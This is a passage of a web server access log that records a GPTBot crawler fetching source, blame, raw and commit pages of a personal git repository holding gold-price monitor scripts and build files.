+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/Old_GoldMonitor.py" +[17/Feb/2026:13:47:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 9898] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/Old_GoldMonitor.py" +[17/Feb/2026:13:47:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 901] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_Final.spec" +[17/Feb/2026:13:47:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 12494] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_Final.spec" +[17/Feb/2026:13:47:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 14358] [Gzip 7.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/Old_GoldMonitor.py" +[17/Feb/2026:13:47:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 901] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_Final.spec" +[17/Feb/2026:13:47:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 2967] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/Old_GoldMonitor.py" +[17/Feb/2026:13:47:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 9900] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/Old_GoldMonitor.py" +[17/Feb/2026:13:47:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 17394] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_VeryGood.py" +[17/Feb/2026:13:47:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.ico" [Client 74.7.227.38] [Length 226366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.ico" +[17/Feb/2026:13:47:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 18098] [Gzip 8.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_KRX.py" +[17/Feb/2026:13:47:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 17561] [Gzip 5.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:13:47:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 14451] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/Old_GoldMonitor.py" +[17/Feb/2026:13:47:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 5792] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_KRX.py" +[17/Feb/2026:13:47:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 11718] [Gzip 5.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_Final.spec" +[17/Feb/2026:13:47:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 9869] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_Final.spec" +[17/Feb/2026:13:47:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 9917] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:13:47:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 9897] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_KRX.py" +[17/Feb/2026:13:47:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_VeryGood.py" +[17/Feb/2026:13:47:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 9868] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_VeryGood.py" +[17/Feb/2026:13:47:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 17654] [Gzip 8.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_VeryGood.py" +[17/Feb/2026:13:47:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_VeryGood.py" +[17/Feb/2026:13:47:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 5792] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_KRX.py" +[17/Feb/2026:13:47:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 2967] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/Old_GoldMonitor.py" +[17/Feb/2026:13:47:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 18099] [Gzip 8.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_KRX.py" +[17/Feb/2026:13:47:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 14327] [Gzip 7.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/Old_GoldMonitor.py" +[17/Feb/2026:13:47:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 17424] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:13:47:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 9862] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/Old_GoldMonitor.py" +[17/Feb/2026:13:47:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 17529] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_KRX.py" +[17/Feb/2026:13:47:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 9894] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_KRX.py" +[17/Feb/2026:13:47:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 901] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_Final.spec" +[17/Feb/2026:13:47:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 10421] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:13:47:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 71830] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:13:47:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 12292] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:13:47:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 12290] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:13:47:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10983] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:47:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 10945] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:47:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 17687] [Gzip 8.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_VeryGood.py" +[17/Feb/2026:13:47:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 9901] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_VeryGood.py" +[17/Feb/2026:13:47:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 9865] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_KRX.py" +[17/Feb/2026:13:47:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_VeryGood.py" +[17/Feb/2026:13:47:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 5792] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_KRX.py" +[17/Feb/2026:13:47:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 18064] [Gzip 8.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_KRX.py" +[17/Feb/2026:13:47:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 137900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:13:47:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 9895] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.spec" +[17/Feb/2026:13:47:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 9899] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.spec" +[17/Feb/2026:13:47:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10935] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:13:47:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 11504] [Gzip 5.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.spec" +[17/Feb/2026:13:47:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 11505] [Gzip 5.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.spec" +[17/Feb/2026:13:47:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr 